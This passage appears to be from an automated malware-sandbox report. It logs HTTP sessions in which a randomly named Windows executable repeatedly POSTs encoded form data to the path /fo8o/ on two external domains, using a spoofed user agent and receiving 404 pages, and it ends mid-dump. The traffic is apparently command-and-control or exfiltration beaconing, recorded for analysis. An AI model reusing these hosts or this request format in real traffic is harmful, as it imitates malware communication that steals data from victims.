3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49733	66.29.149.46	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:37.764691114 CEST	1811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 39 68 4d 77 6e 74 50 62 42 6b 57 43 67 36 34 30 57 38 69 68 53 35 4c 52 2b 34 76 2f 70 31 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4e 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f 4c 75 50 4f 55 49 4d 53 69 38 42 4c 62 34 37 4a 48 70 35 6e 51 5a 4e 63 5a 58 6a 36 78 52 79 34 64 6b 37 64 61 45 34 51 79 63 43 76 55 55 7a 55 65 36 45 44 6c 47 69 78 51 4c 6f 32 4a 79 78 64 43 43 6a 42 39 39 42 72 76 70 68 7a 76 58 77 6f 59 67 45 47 47 42 65 67 42 59 55 76 44 31 4d 34 4b 77 68 69 4b 44 6a 42 6b 70 35 2b 38 53 6a 46 70 63 4c 6a 6a 33 56 37 66 51 70 53 52 30 50 53 62 75 70 34 73 53 35 53 4e 67 63 71 79 31 4f 79 4e 53 4e 51 64 6e 44 33 48 68 75 31 79 54 67 7a 33 33 35 38 58 35 4c 33 67 77 63 4e 39 37 2f 54 62 38 4e 38 30 69 63 52 58 63 69 31 77 72 32 43 4f 7a 30 62 5a 6f 37 55 54 48 71 7a 76 65 48 50 64 39 6d 47 68 61 2f 35 55 6b 41 61 46 44 64 41 47 56 36 33 43 66 37 6a 39 73 6a 61 70 47 62 4b 71 56 45 45 4c 70 65 4c 31 69 35 62 4c 32 36 59 67 46 78 64 4a 35 6c 4e 65 2b 59 54 33 59 4d 39 4f 6c 6d 71 6d 44 32 55 4a 76 6b 42 7a 2b 42 63 37 55 45 6f 33 30 6b 75 46 4d 6a 78 36 2b 57 6b 43 57 4b 32 70 74 42 32 48 35 69 50 61 4f 51 6d 43 69 52 55 71 67 75 52 73 43 43 4f 52 32 58 79 56 39 72 33 62 44 65 33 53 72 39 44 50 77 50 6e 63 73 59 56 6b 39 4f 4c 2f 42 76 32 45 36 70 44 4b 5a 59 6b 72 54 62 4e 49 4e 46 4a 73 75 33 63 39 79 6c 55 4a 65 62 58 38 6a 30 47 76 5a 4d 35 38 69 69 4a 52 51 74 68 34 71 33 67 52 68 6f 71 6f 57 43 56 74 70 67 6f 39 4a 46 41 69 52 45 75 33 72 54 46 4c 35 55 70 47 6e 38 2f 5a 64 48 4c 39 57 34 33 4d 48 46 6f 52 56 59 72 42 44 38 78 36 50 54 50 4f 36 68 52 70 6f 4a 79 75 54 72 42 62 77 4e 53 76 36 64 36 2f 6e 76 5a 57 59 35 65 30 37 47 35 5a 31 4d 35 4f 4f 61 59 63 36 47 30 52 36 58 30 61 50 54 2f 69 41 4a 66 4e 39 46 33 5a 53 70 71 34 30 35 6e 54 50 48 48 2f 64 53 4f 41 64 68 4e 39 48 58 76 62 57 75 34 43 39 39 50 55 74 36 69 35 7a 6a 6c 56 4e 51 4d 48 66 77 2b 46 34 65 31 74 4b 56 78 36 73 61 7a 4d 34 56 4e 69 64 37 34 45 53 4c 6e 6f 31 70 61 47 50 58 4a 34 4c 32 62 4d 75 58 6c 4b 74 62 5a 58 6c 42 42 43 50 51 45 57 66 56 4f 41 6a 41 75 76 6a 70 54 45 53 48 64 2f 63 34 50 2f 74 6b 58 78 31 42 47 34 4a 4e 31 34 65 34 41 56 2b 54 47 33 78 54 53 51 57 46 34 51 66 71 44 4d 50 75 4c 53 4c 6c 2b 6d 52 56 6e 56 65 2b 37 64 7a 79 50 66 65 38 73 49 72 5a 73 7a 78 49 73 2b 50 42 69 34 4e 49 53 41 72 6c 41 43 45 58 76 36 75 4a 33 41 4b 5a 68 64 75 4f 43 39 58 50 44 75 2b 62 77 33 45 74 74 49 41 45 61 45 77 63 77 58 49 6b 73 57 34 30 56 6c 54 58 6e 49 2f 42 34 5a 30 72 73 36 78 43 52 4c 36 59 58 34 39 70 53 37 30 57 6e 51 52 65 4e 7a 4a 73 5a 58 47 56 6c 50 32 69 39 76 36 49 41 31 55 50 6b 6b 34 66 55 45 72 65 35 51 73 35 4c 38 6a 66 76 30 55 37 77 62 48 43 31 51 50 44 68 6a 6a 6c 64 6e 5a 6e 53 31 74 71 64 42 37 54 63 46 6c 70 79 62 6c 4c 47 51 6f 61 35 78 69 71 78 31 65 43 56 4d 59 4d 72 63 3d Data Ascii: OVFPBtpp=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMy9hMwntPbBkWCg640W8ihS5LR+4v/p1YxCS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MNLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvXwoYgEGGBegBYUvD1M4KwhiKDjBkp5+8SjFpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNSNQdnD3Hhu1yTgz3358X5L3gwcN97/Tb8N80icRXci1wr2COz0bZo7UTHqzveHPd9mGha/5UkAaFDdAGV63Cf7j9sjapGbKqVEELpeL1i5bL26YgFxdJ5lNe+YT3YM9OlmqmD2UJvkBz+Bc7UEo30kuFMjx6+WkCWK2ptB2H5iPaOQmCiRUqguRsCCOR2XyV9r3bDe3Sr9DPwPncsYVk9OL/Bv2E6pDKZYkrTbNINFJsu3c9ylUJebX8j0GvZM58iiJRQth4q3gRhoqoWCVtpgo9JFAiREu3rTFL5UpGn8/ZdHL9W43MHFoRVYrBD8x6PTPO6hRpoJyuTrBbwNSv6d6/nvZWY5e07G5Z1M5OOaYc6G0R6X0aPT/iAJfN9F3ZSpq405nTPHH/dSOAdhN9HXvbWu4C99PUt6i5zjlVNQMHfw+F4e1tKVx6sazM4VNid74ESLno1paGPXJ4L2bMuXlKtbZXlBBCPQEWfVOAjAuvjpTESHd/c4P/tkXx1BG4JN14e4AV+TG3xTSQWF4QfqDMPuLSLl+mRVnVe+7dzyPfe8sIrZszxIs+PBi4NISArlACEXv6uJ3AKZhduOC9XPDu+bw3EttIAEaEwcwXIksW40VlTXnI/B4Z0rs6xCRL6YX49pS70WnQReNzJsZXGVlP2i9v6IA1UPkk4fUEre5Qs5L8jfv0U7wbHC1QPDhjjldnZnS1tqdB7TcFlpyblLGQoa5xiqx1eCVMYMrc=
Apr 26, 2024 10:08:37.967094898 CEST	637	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:37 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49734	66.29.149.46	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:40.488677979 CEST	508	OUT	GET /fo8o/?OVFPBtpp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:08:40.692908049 CEST	652	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:40 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49735	195.110.124.133	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:46.559204102 CEST	792	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 30 4e 78 49 41 77 57 76 65 45 77 52 59 6f 58 4d 5a 68 46 6d 37 78 76 39 74 5a Data Ascii: OVFPBtpp=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj0NxIAwWveEwRYoXMZhFm7xv9tZ
Apr 26, 2024 10:08:46.807281017 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:46 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49736	195.110.124.133	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:49.335047007 CEST	816	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 6f 61 6b 78 51 2f 32 65 39 37 32 4a 59 4c 6b 39 35 71 4b 52 72 49 4f 79 4d 77 3d 3d Data Ascii: OVFPBtpp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7WoakxQ/2e972JYLk95qKRrIOyMw==
Apr 26, 2024 10:08:49.586144924 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:08:49 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49737	195.110.124.133	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:08:52.114691973 CEST	1829	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 72 36 30 53 61 49 71 73 39 59 76 43 4b 61 34 34 35 6f 33 44 76 49 62 39 54 72 53 68 7a 2b 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 75 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 76 4e 77 73 56 47 72 43 39 49 66 77 32 59 72 64 43 52 74 74 36 43 38 57 33 4c 59 4e 4d 52 6f 35 62 59 52 73 70 35 6e 4d 2f 65 71 69 4b 5a 6f 78 44 66 6c 70 4c 4a 43 42 31 6c 52 6f 64 72 4e 74 39 77 4c 30 34 4e 64 37 61 64 59 36 4f 4a 57 62 34 37 36 71 30 51 2b 62 6d 62 30 68 6e 4b 62 66 33 54 48 78 6d 61 65 6e 45 66 69 75 56 51 73 75 37 32 62 73 59 45 70 67 52 6e 34 6d 30 41 52 4e 77 6a 59 74 41 36 35 59 4f 53 37 4a 58 41 38 71 51 63 4b 39 6c 59 76 2f 2b 4e 2b 50 72 5a 4f 4e 59 4e 70 6f 4b 51 33 73 6c 30 49 58 43 2f 36 7a 55 2b 78 71 31 66 77 67 72 38 4a 4e 52 52 45 59 56 41 33 45 64 75 62 72 4c 76 62 56 41 6d 64 68 4e 33 31 48 42 2f 73 73 34 52 57 46 50 79 4c 62 73 57 4a 4c 55 7a 45 6e 58 50 65 31 6c 47 47 61 41 57 46 6d 46 6c 55 39 33 75 4f 53 31 6b 44 75 33 62 46 34 62 32 71 44 52 36 2f 42 33 45 6d 74 30 33 61 67 4e 39 67 51 52 34 37 47 6a 6e 67 6d 78 37 35 6f 44 55 76 75 48 4a 64 4d 78 33 75 6e 6c 69 44 56 74 55 55 75 55 78 2b 54 36 5a 77 6b 51 38 33 74 74 6d 4c 2b 4c 6b 7a 4a 42 2f 67 52 58 4e 63 5a 43 52 62 6b 59 7a 64 34 73 67 74 46 68 6d 74 30 7a 57 38 7a 56 7a 74 32 6b 34 6e 54 61 55 6d 70 69 6a 59 6a 74 39 58 37 6a 51 6f 54 6c 56 33 4d 4c 45 58 4f 6e 72 6f 43 36 6c 53 6f 32 2f 50 6b 39 62 78 41 64 44 70 79 49 32 72 39 70 77 74 4c 6e 30 67 50 2f 67 51 4d 43 58 55 72 58 2f 38 66 55 41 44 30 72 63 32 50 75 58 63 59 56 58 51 57 6f 55 72 38 4f 69 52 59 56 6c 7a 53 4b 7a 46 55 4d 52 50 2f 69 4d 2f 4b 45 4f 68 32 33 6c 79 4c 77 67 4e 79 4e 45 56 55 77 70 6b 42 75 37 65 4f 54 43 45 53 42 6e 68 6c 6e 6b 6d 78 45 6a 2f 6c 77 58 33 5a 43 74 32 2b 4d 79 52 51 59 56 61 71 53 39 5a 52 52 62 57 47 56 78 66 65 36 31 59 2f 4c 50 51 57 6d 34 5a 64 5a 4b 4e 52 34 41 4e 7a 67 37 79 4d 58 56 